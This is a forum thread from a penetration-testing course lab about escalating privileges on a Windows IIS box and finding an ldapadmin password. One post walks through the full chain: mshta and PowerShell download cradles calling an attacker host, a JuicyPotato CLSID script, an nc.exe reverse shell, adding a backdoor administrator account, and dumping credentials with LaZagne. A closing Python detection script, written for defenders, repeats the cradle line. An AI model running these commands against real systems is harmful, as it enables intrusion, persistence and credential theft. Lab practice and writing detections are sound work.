One of the tasks in Skills Assessment - Part I is: “Find the password for the ldapadmin account somewhere on the system”. I searched around the whole box with a low-privileged shell but I cannot find the ldapadmin password. I used all the techniques described in the module. Any clue?
Has anyone had luck here? I finished the rest of the skill assessment but I’m still stuck here too… any tips?
Hi All, I was also stuck on this question for a long time and finally found the password today!!!
The question (“Find the password for the ldapadmin account somewhere on the system.”) itself already contains a hint; please search and look at the file carefully with a “nice” privileges account.
I tried with SYSTEM privileges and still had no luck
For the life of me, I can’t escalate the privileges. I pretty much right away discovered and exploited a command injection vulnerability and used it to upload various tools to the server (juicypotato, roguepotato, printspoofer, nc…). I checked the privs on the account I currently control and I see that I have SeImpersonatePrivilege enabled, but none of the tools seem to work (either via command injection and catching a shell or directly via a meterpreter session):
- juicypotato exits with:
COM → recv failed with error: 10038
- printspoofer exits with:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
[-] Operation failed or timed out.
- roguepotato exits with:
[+] Starting RoguePotato…
[!] RogueOxidResolver not run locally. Ensure you run it on your remote machine
[*] Creating Pipe Server thread…
[*] Creating TriggerDCOM thread…
[*] Listening on pipe \\.\pipe\RoguePotato\pipe\epmapper, waiting for client to connect
[*] Calling CoGetInstanceFromIStorage with CLSID:{4991d34b-80a1-4291-83b6-3328366b9097}
[*] IStoragetrigger written:106 bytes
[-] Named pipe didn’t received any connect request. Exiting …
I tried many different CLSIDs (matched to the OS version and build from the systeminfo data) but none seem to work. I’m starting to think that this is not the intended way. Can anyone please provide any hints?
Hey @r3r00t, you’re on the right track and doing everything right. DM me on Discord (same handle) and we can troubleshoot when I get my notes pulled up.
Hey @SuprN0vaSc0t1a , just as you replied, I managed to pick the right CLSID, as it seems that was the main issue. But I do appreciate your assistance. I kind of had the exact same dilemmas as you, especially in regard to picking the listening port…
And to answer the OP’s question from all the way up, when searching for those two other things (files), it’s about having the right set of privileges so you can actually access things that you otherwise initially can’t.
I finished this module and took detailed notes, so if anyone needs help feel free to message me!
Hello,
I am also stuck finding the password for “ldapadmin”.
I understand it is not a user on that system. However, I had no luck finding it using the Credential Hunting methodology shown in the module. I am still with my initial user privileges of the IIS-user. Is there anything I can do to get additional access to files or log data prior to privilege escalation?
Any hints are welcome!
I had the best luck after privilege escalation. You do not need that password for escalation, only for that question.
If any of you all are still on here, I’m now also working on the Part I skills assessment. I’m not sure how to exploit the command injection vulnerability.
I’ve tried a few netcat one-liners made for Windows CMD but I’m not getting reverse shells with those. Using some firewall commands I know the machine has Windows Firewall active, so that could be interfering with the reverse shell.
Any tips or hints?
Hi, I did the escalation but I can’t find anywhere that damned password. Can you help me?
I am stuck at the same place. I rooted the box with JuicyPotato but for the love of me still can’t find the “ldapadmin” password. I have tried everything: string search, config file search and even registry entry search. Still clueless… I finished the entire module except this question.
Hi, I’m stuck at Windows Privilege Escalation Skills Assessment - Part I. I have command execution but I can’t get the reverse shell to work. Any hint?
@truthreaper I used the Metasploit module “exploit/windows/misc/hta_server” to get a meterpreter shell.
The command will look like this: 10.10.x.x | mshta.exe http://10.10.x.x:8080/BKVPpG8.hta
I am working on PrivEsc now.
@jackyLam What do you mean by “nice” privileges? Administrator? I got admin via Juicy Potato but where is the dang file? LOL
Sometimes, y’all have to go back to the drawing board when you get stuck during penetration testing or any engagement. I banged my head so many times before I finally got to solve this particular assessment. So if you’re stuck, do follow these steps:
- Get a webshell from the command injection vuln. Grab a PowerShell payload from PayloadsAllTheThings; the second PowerShell reverse shell worked for me. Intercept a normal request with Burp and paste your shell (example: 127.0.0.1 & ). Make sure you URL-encode your PowerShell because of bad characters that might break your shell.
- Do normal enumeration and your privilege check. You will find out that SeImpersonatePrivilege is enabled. Here is where the trick begins. JuicyPotato won’t work for you directly off the box, because you didn’t provide the right port for your COM server.
Checking CLSIDs
First, you will need some executables apart from juicypotato.exe. Download Join-Object.ps1 and load it into your PS session, and grab the possible CLSIDs to test. Then download test_clsid.bat (change the path to the CLSID list and to the juicypotato executable) and execute it. It will start trying every CLSID, and when the port number changes, that means the CLSID worked.
Navigate to C:\Users\Public\Documents\ directory and drop all your tools here.
- JuicyPotato.exe
- nc.exe
- Join-Object.ps1 (juicy-potato/Join-Object.ps1 at master · ohpe/juicy-potato · GitHub)
- CLSID.list (juicy-potato/CLSID.list at master · ohpe/juicy-potato · GitHub)
- Test_clsid.bat (juicy-potato/test_clsid.bat at master · ohpe/juicy-potato · GitHub)
First download all the files to your attack machine. Start up a web server with Python (python3 -m http.server 9001) and on the target, run (wget http://attack-ip:9001/JuicyPotato.exe -o JuicyPotato.exe). Do this for all five tools needed for the task.
If you wget the files without the -o flag, the files won’t be saved on the target machine.
You might want to make a few changes to test_clsid.bat before transferring it to the target machine.
Here is the content:
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
    echo %%i !port!
    juicypotato.exe -z -l !port! -c %%i >> result.log
    set RET=!ERRORLEVEL!
    :: echo !RET!
    if "!RET!" == "1" set /a port=port+1
)
You can change CLSID.list to .\CLSID.list (or whatever name you saved your CLSID.list with), but make sure you prepend .\ to run it from the current directory, or specify the absolute path to where it is saved.
Do the same for juicypotato.exe (.\jp.exe or .\juicypotato.exe), depending on the name you saved it with.
Next:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\Join-Object.ps1
Next:
cmd /c .\test_clsid.bat // If everything goes as planned, you will see a list of CLSIDs and port numbers. Any time the port number changes, the CLSID before the next port number is a valid CLSID. But don’t get too excited about this: copy the CLSID and (using Ctrl+F) find it in the list of CLSIDs on this site: Windows Server 2016 Standard | juicy-potato. If the CLSID matches the user NT AUTHORITY\SYSTEM, that means you’re good to go.
NEXT:
.\jp.exe -l -c "" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://attacker-ip/Invoke-PowershellTcp.ps1')" -t *
or
JuicyPotato -l <newly found port> -c "<newly found clsid>" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe attacker-ip listening-port" -t *
If everything goes as planned, you will get NT AUTHORITY\SYSTEM privileges.
- Create a new user (net user attacker P@ssw0rd! /add)
- Add attacker to the admin group (net localgroup Administrators attacker /add)
- We discovered that port 3389 is open from our initial nmap scan, so we give attacker remote access (net localgroup "Remote Management Users" attacker /add)
To make your life easy, you can now RDP with the newly created account.
Your first flag is on the Administrator desktop.
Next flag, the ldapadmin password: you have to download LaZagne.exe to the target machine, and since you’re already admin, it will dump all passwords and hashes, where you will find the ldapadmin password.
Final flag: open cmd.exe and run dir /S /B confidential.txt (make sure you run it from the C:\ directory).
REACH OUT TO ME IF YOU'RE STILL HAVING ISSUES
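A defender-side counterpart to the chain walked through in this post (IIS app pool identity, command injection, PowerShell download cradle, then SeImpersonatePrivilege tooling), as an added example that is not from the thread or from the assessment: a small Python triage over process-creation records. The pipe-separated record format, the sample lines and the severity rules are my assumptions; real input would come from Sysmon event 1 or Security event 4688 with command-line logging enabled.

```python
import re

# Constructed sample records (not from the box): "parent|child|user|command line".
SAMPLE_EVENTS = [
    "w3wp.exe|cmd.exe|IIS APPPOOL\\DefaultAppPool|cmd.exe /c ping -n 1 127.0.0.1",
    "w3wp.exe|cmd.exe|IIS APPPOOL\\DefaultAppPool|cmd.exe /c ping -n 1 127.0.0.1 & "
    "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://attacker-ip/Invoke-PowershellTcp.ps1')",
    "cmd.exe|juicypotato.exe|IIS APPPOOL\\DefaultAppPool|juicypotato.exe -l 10000 -c {clsid-placeholder} -p c:\\windows\\system32\\cmd.exe -t *",
    "explorer.exe|cmd.exe|HTB\\alice|cmd.exe",
    "services.exe|svchost.exe|NT AUTHORITY\\SYSTEM|svchost.exe -k netsvcs",
]

WEB_WORKERS = {"w3wp.exe"}                       # IIS worker process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line markers of download cradles and policy bypass, as used by the payloads in this thread.
CRADLE = re.compile(r"(?i)downloadstring|\biex\b|invoke-expression|-ep\s+bypass|-executionpolicy\s+bypass|-enc\b|-encodedcommand")
# Name-based match for impersonation-abuse tools; trivially evaded by renaming, so it only backs up the parent/child rule.
IMPERSONATION_TOOLS = ("potato", "printspoofer")


def parse_event(line):
    parent, child, user, cmdline = line.split("|", 3)
    return {"parent": parent.lower(), "child": child.lower(), "user": user, "cmdline": cmdline}


def classify(ev):
    """Return 'high', 'medium' or None for one parsed process-creation event."""
    app_pool = ev["user"].upper().startswith("IIS APPPOOL\\")
    web_spawned_shell = ev["parent"] in WEB_WORKERS and ev["child"] in SHELLS
    cradle = bool(CRADLE.search(ev["cmdline"]))
    if web_spawned_shell and cradle:
        return "high"    # web server shelled straight into a download cradle: the injection-to-shell step
    if app_pool and any(t in ev["child"] for t in IMPERSONATION_TOOLS):
        return "high"    # app pool identity running a SeImpersonatePrivilege abuse tool
    if web_spawned_shell or (app_pool and ev["child"] in SHELLS):
        return "medium"  # a shell under a web worker is rare enough to review even without a cradle
    return None


def triage(lines):
    """Return [(severity, child, cmdline)] for flagged events, in input order."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev:
            hits.append((sev, ev["child"], ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for sev, child, cmd in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {child}: {cmd}")
```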